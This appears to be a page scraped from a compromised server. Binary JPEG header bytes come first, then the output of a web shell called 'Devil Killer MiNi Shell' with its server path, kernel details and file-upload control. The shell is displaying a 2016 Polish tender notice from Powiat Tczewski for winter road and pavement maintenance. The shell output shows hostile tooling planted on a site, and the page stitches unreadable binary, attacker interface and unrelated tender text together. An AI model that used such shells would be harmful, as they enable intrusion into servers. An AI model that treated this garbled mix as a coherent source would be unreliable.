JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161110/340431-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='przetargi.powiat.tczew.pl' target='_blank'>przetargi.powiat.tczew.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 340431 - 2016
              z dnia 2016-11-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tczew: Zimowe utrzymanie dróg powiatowych na terenie Powiatu Tczewskiego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Tczewski, krajowy numer identyfikacyjny
              , ul.
              ul. Piaskowa 
              2,
              83110  
              Tczew, woj.
              pomorskie, państwo
              Polska, tel.
              587 734 800, e-mail
              , faks
              .
              <br />
              Adres strony internetowej (URL): powiat.tczew.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />przetargi.powiat.tczew.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />przetargi.powiat.tczew.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg powiatowych na terenie Powiatu Tczewskiego<br /><b>Numer referencyjny: </b>ZP.272.17.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>2.1	Przedmiotem zamówienia jest kompleksowe świadczenie usług zimowego utrzymania dróg powiatowych na terenie Powiatu Tczewskiego.
2.2	Zamawiający dokonał podziału zamówienia na dwie części i dopuszcza możliwość składania ofert częściowych. Zamawiający nie zastrzega liczby części zamówienia, na
które Wykonawca może złożyć ofertę przetargową.
2.3	Przedmiot zamówienia obejmuje następujące części zamówienia:
1)	Część nr 1 zamówienia: zimowe utrzymanie jezdni;
2)	Część nr 2 zamówienia: zimowe utrzymanie chodników.

CZĘŚĆ NR 1
2.4	Świadczenie usług w zimowym utrzymaniu jezdni dróg powiatowych w następującym zakresie:
2.4.1	odśnieżania i posypywania materiałem uszarstniającym dróg powiatowych na
terenie gminy Tczew i gminy Subkowy wyznaczonych w załączonym wykazie dróg o łącznej długości 100,212 km (Załącznik nr 4 do SIWZ), 
2.4.2	odśnieżania dróg powiatowych na terenie Powiatu Tczewskiego koparko-ładowarkami, ładowarką np. typu fadroma oraz pługiem ciężkim (sprzęt dodatkowy), 
2.4.3	świadczenia usług związanych z interwencyjnym wywozem śniegu (teren Powiatu Tczewskiego).
Usługi wskazane w pkt 2.4.1 będą zlecane na terenie gminy Tczew i gminy Subkowy, wskazane w pkt 2.4.2  2.4.3 mogą być zlecane na terenie całego Powiatu.
2.5	Zamawiający zapewnia:
2.5.1	dwie piaskarki,
2.5.2	dwa pługi,
2.5.3	mieszankę do posypywania dróg,
2.5.4	miejsce służące za składowisko mieszanki i punkt załadowczy na terenie bazy w
Tczewie przy ul. Armii Krajowej 84 (wskazane miejsce nie posiada żadnego zaplecza socjalnego dla pracowników  jest to jedynie miejsce składowania materiałów i punkt załadowczy).
2.6	Wykonawca musi zapewnić:
2.6.1	jedną solarko-piaskarkę o pojemności zasobnika minimum 4 m3 (na wypadek awarii sprzętu podstawowego) posiadającą  automatyczny system sterowania zapewniający stabilność wydatku posypywania niezależnie od zmiany prędkości nośnika i szerokości posypywania, automatyczne bezstopniowe lub stopniowe dozowania mieszanek uszarstniających od 10 do 30 g/m2 oraz automatyczne bezstopniowe lub stopniowe sterowanie szerokością posypywania od 2 do 7 m z możliwością posypywania asymetrycznego,
2.6.2	dwa samochody o ładowności minimum 8 ton (w tym jeden z napędem na trzy osie) umożliwiające zamontowanie i właściwą pracę piaskarki z pługiem, 
2.6.3	samochód rezerwowy do świadczenia usług w przypadku awarii pojazdu podstawowego,
2.6.4	sprzęt załadowczy umożliwiający każdorazowy załadunek mieszanki na samochody,
2.6.5	minimum dwie koparko-ładowarki o pojemności ładowacza powyżej 1 m3,
2.6.6	młot hydrauliczny montowany na sprzęcie umożliwiający skuwanie lodu,
2.6.7	samochód z napędem minimum na trzy osie z zamontowaną czołownicą i pługiem ciężkim dwustronnym do interwencyjnego usuwania zasp śnieżnych o wysokości powyżej 0,5 m,
2.6.8	minimum jedną ładowarkę o pojemności ładowacza powyżej 3 m3,
2.6.9	ekipę do wywozu śniegu składającą się z samochodu samowyładowczego o pojemności skrzyni ładunkowej od 12 do 16 m3, koparko-ładowarki o pojemności ładowacza powyżej 1 m3 oraz 4 pracowników,
2.6.10	odpowiednią ilość kierowców i operatorów zapewniającą pełną obsługę całości sprzętu, wyposażonych w telefony komórkowe (kontakt całodobowy).
2.7	Orientacyjna wielkość przedmiotu zamówienia:
UWAGA! Na potrzeby porównania i oceny ofert Wykonawca obliczy łączną cenę ofertową na podstawie prognozowanych ilości godzin dla poszczególnych rodzajów usług (zgodnie z formularzem cenowym). Ma to jedynie charakter pomocniczy i teoretyczny, a rozliczenie będzie następowało w oparciu o rzeczywiste wykonanie czynności na podstawie stawek zawartych w formularzu cenowym oraz umowie.
2.8	Zakres i sposób świadczenia usług:
Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia zgodnie ze standardem i zakresem zimowego utrzymania określonymi w Załączniku nr 4 i 5 do specyfikacji. Łączna długość dróg powiatowych w gminie Tczew i gm. Subkowy objętych zimowym utrzymaniem wynosi 100,212 km. Ilości faktycznie wykonanych usług będą potwierdzane dokumentami pracy pojazdu wg wzoru stanowiącego Załącznik nr 6 do SIWZ. 
Zamawiający zastrzega sobie możliwość zmiany zakresu świadczonych usług.

Wykonawca jest obowiązany posiadać cały sprzęt, jakim dysponuje, w gotowości wyjazdu w ciągu maksymalnie 1,5 godziny (samochody z piaskarkami). Uruchomienie sprzętu będzie ogłaszane przez przedstawiciela Zamawiającego lub przez Wykonawcę po uzgodnieniu tego z Zamawiającym (telefoniczne, wiadomością sms, faksem lub pocztą e-mail).
Usługi dodatkowe (koparko-ładowarki, ładowarka, pług ciężki, wywóz śniegu) będą zlecane tylko w sytuacji znacznego pogorszenia sytuacji na drogach - Zamawiający zastrzega, iż w przypadku wyjątkowo łagodnej zimy istnieje możliwość nie zlecania tego rodzaju usług.
UWAGA!
Wykonawca w ramach niniejszej umowy, na własny koszt, jest zobowiązany do posiadania w samochodach będących nośnikami do piaskarek i pługów, systemów lokalizacji GPS oraz do udostępnienia Zamawiającemu możliwości stałego monitorowania pracy pojazdów na następujących zasadach: 
-	systemy monitorowania pojazdów będą zamontowane na obu samochodach używanych do zimowego utrzymania dróg (nośniki do piaskarek i pługów),
-	kierowcy Wykonawcy obsługujący w/w samochody będą zobowiązani do każdorazowego uruchomienia systemów na czas prowadzenia akcji  godziny przepracowane przez sprzęt bez uruchomionego systemu nie będą podstawą do zapłaty (nie dotyczy pojazdu zastępczego).
2.9	Wynagrodzenie Wykonawcy w trakcie trwania umowy będzie obliczane w następujący sposób:
-	za roboczogodzinę pracy jednego nośnika z piaskarką i pługiem (odśnieżanie, odśnieżanie z posypywaniem lub posypywanie) w gotowości wyjazdu w ciągu maksymalnie 1,5 godziny od zgłoszenia,
-	za roboczogodzinę odśnieżania przy użyciu koparko-ładowarki (poj. pow. 1 m3) w gotowości wyjazdu w ciągu 2 godzin od zgłoszenia,
-	za roboczogodzinę odśnieżania przy użyciu pługa ciężkiego w gotowości wyjazdu w ciągu 2 godzin od zgłoszenia,
-	za roboczogodzinę skuwania lodu przy użyciu sprzętu z zamontowanym młotem hydraulicznym w gotowości wyjazdu w ciągu 3 godzin od zgłoszenia,
-	za roboczogodzinę odśnieżania przy użyciu ładowarki (poj. pow. 3 m3) w gotowości wyjazdu w ciągu 2 godzin od zgłoszenia,
-	za wywiezienie 1 m3 śniegu z terenu dróg powiatowych w gotowości wyjazdu w ciągu 12 godzin od zlecenia.
W/w wynagrodzenie  musi uwzględniać wszelkie koszty i materiały konieczne do prowadzenia akcji (poza materiałami do zwalczania śliskości zimowej i uszarstniania nawierzchni dróg), tj.:
-	montaż pługów i piaskarek na samochody Wykonawcy oraz demontaż sprzętu po zakończeniu sezonu,
-	wynagrodzenie kierowców, operatorów i pracowników Wykonawcy,
-	posiadanie lamp sygnalizacyjnych koloru pomarańczowego,
-	posiadanie dodatkowych lamp reflektorowych (szperacz),
-	wyposażenie kierowców w telefony komórkowe,
-	każdorazowy załadunek samochodów,
-	paliwo i inne bieżące materiały eksploatacyjne,
-	dojazd do miejsca wezwania,
-	zabezpieczenie materiałów do zwalczania śliskości i uszarstniania przed wpływem warunków atmosferycznych,
-	zmianowość sprzętu,
-	obowiązek w przypadku awarii zastąpienia sprzętem tego samego typu,
-	Wykonawca jest zobowiązany do umycia sprzętu Zamawiającego po zakończeniu każdej z akcji,
-	korzystając z placu na terenie bazy Zamawiającego, Wykonawca jest zobowiązany do regularnego oczyszczania placu i boksów do składowania materiałów,  
-	po zakończeniu sezonu zimowego nastąpi przegląd sprzętu (pługi, piaskarki). Za ewentualne uszkodzenia zostanie obciążony Wykonawca,
-	dojazd do miejsca wezwania (w przypadku wywozu śniegu),
-	miejsce utylizacji śniegu (w przypadku wywozu śniegu).
Wynagrodzenie będzie płacone za godziny pracy sprzętu liczone od wyjazdu z terenu bazy Zamawiającego w Tczewie do momentu zakończenia świadczenia usług.

CZĘŚĆ NR 2
2.10	Świadczenie usług w zimowym utrzymaniu chodników w ciągu dróg powiatowych w następującym zakresie ręcznego lub mechanicznego oczyszczania ze śniegu i lodu oraz posypywania materiałem uszarstniającym chodników na terenie Powiatu Tczewskiego. 
Przedmiotowe usługi mogą być zlecane na terenie całego Powiatu.
2.11	Wykonawca musi zapewnić:
2.11.1	piasek do posypywania chodników,
2.11.2	miejsce składowania materiałów,
2.11.3	wszelkie materiały oraz pracowników niezbędnych do prawidłowego i terminowego odśnieżania chodników, odpowiednią ilość kierowców i operatorów zapewniającą pełną obsługę całości sprzętu, wyposażonych w telefony komórkowe (kontakt całodobowy).
2.12	Orientacyjna wielkość przedmiotu zamówienia:
UWAGA! Na potrzeby porównania i oceny ofert Wykonawca obliczy łączną cenę ofertową na podstawie prognozowanych ilości godzin dla poszczególnych rodzajów usług (zgodnie z formularzem cenowym). Ma to jedynie charakter pomocniczy i teoretyczny, a rozliczenie będzie następowało w oparciu o rzeczywiste wykonanie czynności na podstawie stawek zawartych w formularzu cenowym oraz umowie.
2.13	Zakres i sposób świadczenia usług:
Oczyszczanie chodników ze śniegu i lodu oraz posypanie materiałem uszarstniającym może być wykonywane ręcznie lub mechanicznie. Mechaniczne odśnieżanie chodników może być prowadzone wyłącznie przy użyciu sprzętu zapewniającego nieuszkodzenie nawierzchni chodników.
Chodniki muszą być odśnieżane na całej szerokości. W przypadku uszarstniania nawierzchni chodników minimalne ilości rozsypanego piasku na powierzchni chodnika powinny wynosić minimum 50 gr/m2.
Łączna powierzchnia chodników przewidzianych do odśnieżania na terenie miasta Tczewa wynosi ok. 26,53 a. 
Zamawiający zastrzega sobie możliwość zmiany zakresu świadczonych usług.
Odśnieżanie chodników będzie zlecane w zależności od panujących warunków. W przypadku zlecenia odśnieżenia całego zakresu na terenie miasta Tczewa (ok. 26,53 a) Wykonawca jest zobowiązany wykonać zadanie w nieprzekraczalnym terminie 2 godzin.
Wykonawca będzie powiadamiany o uruchamianiu akcji telefoniczne, wiadomością sms, faksem lub pocztą e-mail. Do wykonywania usługi Wykonawca musi przystąpić w nieprzekraczalnym terminie:
- 	1 godziny od otrzymania zlecenia - na terenie miasta Tczewa
- 	3 godzin od otrzymania zlecenia  poza miastem, na terenie Powiatu Tczewskiego
2.14	Wynagrodzenie Wykonawcy w trakcie trwania umowy będzie obliczane w następujący sposób:
-	za odśnieżenie i posypanie materiałami uszarstniającymi chodników w gotowości reakcji w ciągu 1 godziny od otrzymania zlecenia - za 1 ar (teren miasta Tczewa),
-	za odśnieżenie i posypanie materiałami uszarstniającymi chodników w gotowości reakcji w ciągu 3 godzin od otrzymania zlecenia - za 1 ar (poza miastem),
-	za skucie lodu na chodnikach w gotowości reakcji w ciągu 1 godziny od otrzymania zlecenia - za 1 ar (teren miasta Tczewa),
-	za skucie lodu na chodnikach w gotowości reakcji w ciągu 3 godzin od otrzymania zlecenia - za 1 ar (poza miastem).
W/w wynagrodzenie  musi uwzględniać wszelkie koszty i materiały konieczne do prowadzenia akcji, tj.:
-	wynagrodzenie pracowników Wykonawcy,
-	wyposażenie pracowników w telefony komórkowe,
- 	dojazd do miejsca wezwania,
-	wszelkie materiały konieczne do odśnieżania chodników (np. zakup materiałów uszarstniających (piasek), zapewnienie odpowiedniej ilości pracowników, ew. materiały eksploatacyjne w przypadku mechanicznego wykonywania usług itp).

DOTYCZY OBU CZĘŚCI ZAMÓWIENIA:

2.15	Na podstawie art. 29 ust. 3a Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę, podwykonawcę lub dalszego podwykonawcę osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o pracę. Tak więc wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane z wykonywaniem usług, czyli tzw. pracowników fizycznych. 
Jeżeli podczas realizacji zadania usługę będzie wykonywać osoba niezatrudniona na umowę o pracę co zostanie ustalone przez Zamawiającego osoba taka będzie musiała zakończyć wykonywanie usługi, a Wykonawca zapłaci Zamawiającemu tytułem kary umownej 1 000 PLN za każdy taki przypadek. Fakt ujawnienia takiej osoby musi zostać potwierdzony pisemną notatką sporządzoną przez przedstawicieli Zamawiającego. Notatka nie musi być podpisana przez Wykonawcę lub jego przedstawicieli.

2.16	Informacje o podwykonawcach:
1)	Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę w swojej ofercie (Załączniku Nr 1 do SIWZ  Formularzu oferty) części zamówienia, którą zamierza powierzyć podwykonawcy wraz z podaniem nazwy (imion i nazwisk) oraz danych kontaktowych podwykonawców (osób do kontaktu z nimi), zaangażowanych w  świadczenie usług umownych. Brak takich określeń w ofercie oznaczać będzie, iż Wykonawca deklaruje wykonanie całego przedmiotu zamówienia samodzielnie. 
2)	Jeżeli zmiana albo rezygnacja z podwykonawcy będzie dotyczyć podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 22a ust. 1 Ustawy w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podmiot samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. 
3)	Przy realizacji zamówienia z udziałem podwykonawców zastosowanie mają przepisy art. 36ba ustawy Pzp. 
4)	Powierzenie części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie zamówienia. Wykonawca będzie odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i ich pracowników w takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego własnych pracowników.
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Dotyczy CZĘŚCI NR 1 - Zamawiający oceni, czy Wykonawca spełnia warunek udziału w postępowaniu, określony w pkt 4.1.2 SIWZ dotyczący zdolności technicznej, o którym mowa w art. 22 ust. 1b pkt 3 Ustawy, jeżeli wykaże, że dysponuje sprzętem niezbędnym do realizacji zamówienia publicznego  na podstawie uzupełnionego wykazu znajdującego się w treści Formularza cenowego<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Zgodnie z art. 22a ust. 1 Ustawy Wykonawca może w celu potwierdzenia spełniania warunku udziału w postępowaniu, polegać na zdolnościach technicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca w takiej sytuacji musi udowodnić Zamawiającemu, iż realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, na zasadach określonych w pkt 5.3 SIWZ. 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
